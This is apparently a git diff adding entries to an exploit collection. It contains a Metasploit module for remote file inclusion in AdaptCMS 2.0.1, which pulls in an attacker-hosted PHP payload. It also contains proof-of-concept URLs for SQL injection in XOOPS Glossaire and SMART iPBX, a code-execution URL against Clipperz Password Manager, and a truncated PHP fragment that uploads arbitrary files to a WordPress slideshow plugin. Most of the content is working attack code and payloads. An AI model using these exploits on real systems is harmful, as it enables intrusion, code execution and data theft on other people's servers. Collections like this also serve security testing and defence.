of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::PHPInclude + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit', + 'Description' => %q{ + This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php. + + }, + 'Author' => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'CVE', '2010-2618' ], + [ 'BID', '41116' ], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Compat' => + { + 'ConnectionType' => 'find', + }, + 'Space' => 262144, # 256k + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Oct 12 2010', + 'DefaultTarget' => 0)) + + register_options([ + OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']), + ], self.class) + end + + def php_exploit + + timeout = 0.01 + uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%")) + print_status("Trying uri #{uri}") + + response = send_request_raw( { + 'global' => true, + 'uri' => uri, + },timeout) + + if response and response.code != 200 + print_error("Server returned non-200 status code (#{response.code})") + end + + handler + end + +end \ No newline at end of file diff --git a/platforms/php/webapps/39188.txt b/platforms/php/webapps/39188.txt new file mode 100755 index 000000000..c502e1ffc --- /dev/null +++ b/platforms/php/webapps/39188.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/67460/info + +Glossaire module for XOOPS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +An attacker can leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Glossaire 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/modules/glossaire/glossaire-aff.php?lettre=A[SQL INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/39189.txt b/platforms/php/webapps/39189.txt new file mode 100755 index 000000000..698bb6c34 --- /dev/null +++ b/platforms/php/webapps/39189.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/67465/info + +SMART iPBX is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/editarclave.php?accion=e&id=[SQL INJECTION]]&ld=1 \ No newline at end of file diff --git a/platforms/php/webapps/39190.php b/platforms/php/webapps/39190.php new file mode 100755 index 000000000..f38190a8b --- /dev/null +++ b/platforms/php/webapps/39190.php @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/67469/info + +The cnhk-slideshow plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. + +"@$uploadfile")); +curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); +$result = curl_exec($ch); +curl_close($ch); +print "$result"; +?> diff --git a/platforms/php/webapps/39191.txt b/platforms/php/webapps/39191.txt new file mode 100755 index 000000000..63b51e423 --- /dev/null +++ b/platforms/php/webapps/39191.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/67498/info + +Clipperz Password Manager is prone to remote code-execution vulnerability. + +Attackers can exploit this issue to execute arbitrary code in the context of the affected application. + +http://www.example.com/password-manager-master/backend/php/src/setup/rpc.php?objectname=Xmenu();print_r(php_uname());die \ No newline at end of file